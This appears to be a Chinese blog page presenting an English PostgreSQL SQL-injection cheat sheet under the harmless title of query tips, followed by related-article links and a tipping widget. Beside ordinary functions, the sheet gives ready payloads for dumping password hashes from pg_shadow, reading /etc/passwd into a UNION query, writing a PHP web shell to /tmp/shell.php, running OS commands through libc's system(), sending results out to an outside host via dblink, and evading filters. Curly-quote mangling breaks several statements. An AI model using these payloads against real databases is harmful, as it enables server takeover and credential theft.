PostgreSQL的小技巧

PostgreSQL查询技巧
最新推荐文章于 2025-11-26 13:59:39 发布
原创 最新推荐文章于 2025-11-26 13:59:39 发布 · 213 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #数据库 #运维

本文介绍了一系列PostgreSQL数据库的实用查询技巧,包括批量查询、数据检索、权限管理等操作,为开发者提供高效的数据处理方案。

Note :
#PostgreSQL and PHP supports Batched Queries.
#Awesome, huh?
Version :
SELECT VERSION()
Directories :
SELECT current_setting (‘data_directory’)
SELECT current_setting (‘hba_file’)
SELECT current_setting (‘config_file’)
SELECT current_setting (‘ident_file’)
SELECT current_setting (‘external_pid_file’)
Users :
SELECT user;
SELECT current_user;
SELECT session_user;
SELECT getpgusername();
Current Database :
SELECT current_database();
Concatenation :
SELECT 1||2||3; #Returns 123
Get Collation :
SELECT pg_client_encoding(); #Returns your current encoding (collation).
Change Collation :
SELECT convert(‘foobar_utf8′,’UTF8′,’LATIN1′); #Converts foobar from utf8 to latin1.
SELECT convert_from(‘foobar_utf8′,’LATIN1′); #Converts foobar to latin1.
SELECT convert_to(‘foobar’,'UTF8′); #Converts foobar to utf8.
SELECT to_ascii(‘foobar’,'LATIN1′); #Converts foobar to latin1.
Wildcards in SELECT(s) :
SELECT foo FROM bar WHERE id LIKE ‘test%’; #Returns all COLUMN(s) starting with “test”.
SELECT foo FROM bar WHERE id LIKE ‘%test’; #Returns all COLUMN(s) ending with “test”.
Regular Expression in SELECT(s) :
#Returns all columns matching the regular expression.
SELECT foo FROM bar WHERE id ~* ‘(moo|rawr).*’;
SELECT foo FROM bar WHERE id SIMILAR ‘(moo|rawr).*’;
SELECT Without Dublicates :
SELECT DISTINCT foo FROM bar
Counting Columns :
SELECT COUNT(*) FROM foo.bar; #Returns the amount of rows from the table “foo.bar”.
Get Amount of PostgreSQL Users :
SELECT COUNT(*) FROM pg_catalog.pg_user
Get PostgreSQL Users :
SELECT usename FROM pg_user
Get PostgreSQL User Privileges on Different Columns :
SELECT table_schema,table_name,column_name,privilege_type FROM information_schema.column_privileges
Get PostgreSQL User Privileges :
SELECT usename,usesysid,usecreatedb,usesuper,usecatupd,valuntil,useconfig FROM pg_catalog.pg_user
Get PostgreSQL User Credentials & Privileges :
SELECT usename,passwd,usesysid,usecreatedb,usesuper,usecatupd,valuntil,useconfig FROM pg_catalog.pg_shadow
Get PostgreSQL DBA Accounts :
SELECT * FROM pg_shadow WHERE usesuper IS TRUE
SELECT * FROM pg_user WHERE usesuper IS TRUE
Get Databases :
SELECT nspname FROM pg_namespace WHERE nspacl IS NOT NULL
SELECT datname FROM pg_database
SELECT schema_name FROM information_schema.schemata
SELECT DISTINCT schemaname FROM pg_tables
SELECT DISTINCT table_schema FROM information_schema.columns
SELECT DISTINCT table_schema FROM information_schema.tables
Get Databases & Tables :
SELECT schemaname,tablename FROM pg_tables
SELECT table_schema,table_name FROM information_schema.tables
SELECT DISTINCT table_schema,table_name FROM information_schema.columns
Get Databases, Tables & Columns :
SELECT table_schema,table_name,column_name FROM information_schema.columns
SELECT A Certain Row :
SELECT column_name FROM information_schema.columns LIMIT 1 OFFSET 0; #Returns row 0.
SELECT column_name FROM information_schema.columns LIMIT 1 OFFSET 1; #Returns row 1.

SELECT column_name FROM information_schema.columns LIMIT 1 OFFSET N; #Returns row N.
Conversion (Casting) :
SELECT CAST(’1′ AS INTEGER) #Converts the varchar “1″ to integer.
Substring :
SELECT SUBSTR(‘foobar’,1,3); #Returns foo.
SELECT SUBSTRING(‘foobar’,1,3); #Returns foo.
Hexadecimal Evasion :
#Not as fancy as in MySQL, but it sure works!
SELECT decode(’41424344′,’hex’); #Returns ABCD.
SELECT decode(to_hex(65), chr(104)||chr(101)||chr(120)); #Returns A.
ASCII to Number :
SELECT ASCII(‘A’); #Returns 65.
Number to ASCII :
SELECT CHR(65); #Returns A.
If Statement :
#Impossible in SELECT statements.
#However, here’s a work-around with sub-select(s).
SELECT (SELECT 1 WHERE 1=1); #Returns 1.
SELECT (SELECT 1 WHERE 1=2); #Returns NULL.
Case Statement :
#May be used instead of the If-Statement.
SELECT CASE WHEN 1=1 THEN 1 ELSE 0 END; #Returns 1.
Read File(s) :
CREATE TABLE file(content text);
COPY file FROM ‘/etc/passwd’;
UNION ALL SELECT content FROM file LIMIT 1 OFFSET 0;
UNION ALL SELECT content FROM file LIMIT 1 OFFSET 1;

UNION ALL SELECT content FROM file LIMIT 1 OFFSET N;
DROP TABLE file;
Write File(s) :
CREATE TABLE file(content text);
INSERT INTO file(content) VALUES (‘<?PHP $s=$_GET;@chdir($s[/'x/']);echo@system($s[/'y/'])?>’);
COPY file(content) TO ‘/tmp/shell.php’;
Logical Operator(s) :
#http://en.wikipedia.org/wiki/Logical_connective
AND
OR
NOT
Comments :
SELECT foo, bar FROM foo.bar/* Multi line comment  */
SELECT foo, bar FROM foo.bar– Single line comment
A few evasions/methods to use between your PostgreSQL statements :
CR (%0D); #Carrier Return.
LF (%0A); #Line Feed.
Tab (%09); #The Tab-key.
Space (%20); #Most commonly used. You know what a space is.
Multiline Comment (/**/); #Well, as the name says.
Parenthesis, ( and ); #Can also be used as separators when used right.
Parenthesis instead of space :
#As said two lines above, the use of parenthesis can be used as a separator.
SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2));
Auto-Casting to Right Collation :
SELECT CONVERT_TO(‘foobar’,pg_client_encoding());
Benchmark :
#Takes about 7.5 seconds to perform this logical operation.
#Which can be compared to BENCHMARK(MD5(1),1500000) on MySQL.
SELECT (||/(9999!));
Sleep :
SELECT PG_SLEEP(5); #Sleeps the PostgreSQL database for 5 seconds.
Get PostgreSQL IP :
SELECT inet_server_addr()
Get PostgreSQL Port :
SELECT inet_server_port()
Command Execution :
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6′, ‘system’ LANGUAGE ‘C’ STRICT;
SELECT system(‘echo Hello.’);
DNS Requests (OOB (Out-Of-Band )) :
SELECT * FROM dblink(‘host=www.your.host.com user=DB_Username dbname=DB’, ‘SELECT YourQuery’) RETURNS (result TEXT);
Having Fun With PostgreSQL :
dblink: The Root Of All Evil
Mapping Library Functions
From Sleeping and Copying In PostgreSQL 8.2
Recommendation and Prevention
Introducing pgshell

postgresql 小技巧
05-16
PostgreSQL数据库管理系统中,掌握一些实用的小技巧...了解并熟练运用这些PostgreSQL小技巧,将使你在日常数据库管理和开发工作中更加得心应手。记得根据实际需求灵活应用这些函数和操作符,以实现更高效的数据处理。
一个提升PostgreSQL性能的小技巧
09-10
【描述】:本文主要分享了一个关于提高PostgreSQL数据库性能的小技巧,即通过调整SQL查询语句来显著减少执行时间,这对于需要优化数据库性能的开发者来说非常有价值。 【标签】:PostgreSQL,查询优化 【正文】: ...
PostgreSQL入门及提权
weixin_34075268的博客
04-10 2295
参考文献:http://www.jianfensec.com/postgresql_getshell.htmlhttps://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247484788&idx=1&sn=8a53b1c64d864c...
渗透中利用postgresql getshell
3569
01-11 8799
Copy from http://www.jianfensec.com/postgresql_getshell.html 0x00 前言 研究postgresql数据库如何getshell是在渗透中遇到一个pgAdmin的web管理页面可以直接操作postgresql且通过网上的文章没有达到9.6版本getshell的效果所以便有了以下文章。解决新版本写入函数so文件创建函数失败问
Android VLC播放器二次开发2——CPU类型检查+界面初始化
热门推荐
u011607401的专栏
08-05 9万+
上一篇讲了VLC整个程序的模块划分和界面主要使用的技术,今天分析一下VLC程序初始化过程,主要是初始化界面、加载解码库的操作。今天主要分析一下org.videolan.vlc.gui.MainActivity类,这个是VLC的整个程序入口。当然,严格来说,整个程序入口是VLCApplication类,因为VLC重载了Application,在我分析过的代码里面,貌似稍微复杂一点的程序,都喜欢重载A
practical-programming-books-PostgreSQL数据库优化实战技巧
11-19
首先,我们来了解一下PostgreSQL的基本查询优化技巧。查询优化是数据库优化中的核心部分,它涉及到数据库表的结构设计、索引的使用、SQL语句的优化等方面。在设计数据库表结构时,合理的字段类型选择和表分区可以...
PostgreSQL数据库优化实战技巧.md
11-06
文章深入探讨了PostgreSQL数据库的实战优化技巧,帮助开发者提升数据库性能。 首先,文章介绍了查询性能优化的方法。使用EXPLAIN分析查询计划是其中的重要手段,能够显示查询的执行计划,识别性能瓶颈,包括顺序...
PostgreSql(文件读取写入、命令执行的办法)
lansefly1990的专栏
11-07 8780
copy from:http://www.91ri.org/6507.html 1,文件读取/写入 PostgreSQL 8.1 以后提供了一组现成的文件操作函数 pg_logdir_ls()、pg_ls_dir()、pg_file_rename()、pg_file_write()、 pg_read_file()、pg_length_file(),用这些就可以胡作非为了?你错了。。。 可以用这个...
解决libc.so.6: version `GLIBC_2.14' not found问题
huangbaokang的博客
05-28 8975
0.以下在系统CentOS 6.3 x86_64上操作 1.试图运行程序,提示"libc.so.6: version `GLIBC_2.14’ not found",原因是系统的glibc版本太低,软件编译时使用了较高版本的glibc引起的: [ghui@StuOS bin]$ pwd /var/VMdisks/cross/mingw32/bin [ghui@StuOS bin]$ ls lrel...
libc.so.6(GLIBC_2.14)(64bit) is needed by...问题的解决办法
whatday的专栏
11-20 5万+
在使用Linux服务器过程中,是否有遇到过“libc.so.6(GLIBC_2.14)(64bit) is needed by...”的问题,像小编就遇到了类似的问题:   安装rpm -ivh MySQL-client-advanced-5.6.22-1.el7.x86_64.rpm提示   [root@localhost src]# rpm -ivh MySQL-client-advanc...
解决/lib64/libc.so.6: version `GLIBC_2.14' not found(Linux环境)
运维仙人
02-15 4705
今天运行程序,出现了/lib64/libc.so.6: version `GLIBC_2.14’ not found问题,解决方法如下: 系统环境: redhatt6.7 [root@localhost lib64]#cd /lib64/ [root@localhost lib64]# strings /lib64/libc.so.6 |grep GLIBC GLIBC_2.2.5 GLIBC_...
glibc.so 更名问题
tmjdone的专栏
04-27 582
为了更新glibc, 重命名了下glibc.so 没想到之后什么命令都用不了了。google后结论如下:执行一下命令:LD_PRELOAD=/lib64/libc.so.6.old mv /lib64/libc.so.6.old /lib64/libc.so.6 其中libc.so.6.old是原始libc  
linux安装pgsql rpm,postgresql12-Linux中 RPM 安装
weixin_42186579的博客
05-19 1671
1、软件包准备需要在官网下载以下四个软件包:postgresql12-libs-12.3-1PGDG.rhel6.x86_64.rpmpostgresql12-12.3-1PGDG.rhel6.x86_64postgresql12-server-12.3-1PGDG.rhel6.x86_64.rpmpostgresql12-contrib-12.3-1PGDG.rhel6.x86_64.rpm2、...
PostgreSQL的那点事儿
weixin_34405557的博客
03-08 217
疯狗 · 2013/07/09 16:52今天无意发现了个PostgreSQL环境,线上学习了下,一般的数据注射(读写数据库)差异不大,不做讨论,个人比较关心PostgreSQL的文件读取和命令执行方面。0x00 文件读取/写入PostgreSQL 8.1 以后提供了一组现成的文件操作函数pg_logdir_ls()、pg_ls_dir()、pg_file_rename()、pg_file_wri...
PHP在微服务中的配置中心
最新发布
2509_93947720的博客
11-26 392
在微服务架构里,配置中心相当于所有服务的"指挥中心",把散落在各处的配置项统一收拢管理。而配置中心能让所有服务实时获取最新配置,就像给每个服务装了遥控器,改个参数值都不用重启服务。毕竟PHP天生适合快速迭代,加上配置中心的动态配置能力,简直是为业务频繁变动的场景量身定制的。不过要提醒的是,配置项命名必须规范。我们初期踩过坑,不同团队用不同的命名风格,有的用驼峰有的用下划线,查找配置时特别混乱。说到具体实践,我们团队现在把配置分为三类:静态配置写在代码里,环境配置交给配置中心,动态配置通过管理界面实时调整。
PostgreSQL查询技巧:从批处理到转换操作
"这篇文档主要介绍了在PostgreSQL数据库中的一些实用小技巧,涵盖了查询语句的多样用法和系统信息的获取。通过这些技巧,你可以更有效地管理和操作PostgreSQL数据库。" 在PostgreSQL中,查询语句是日常操作的核心...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值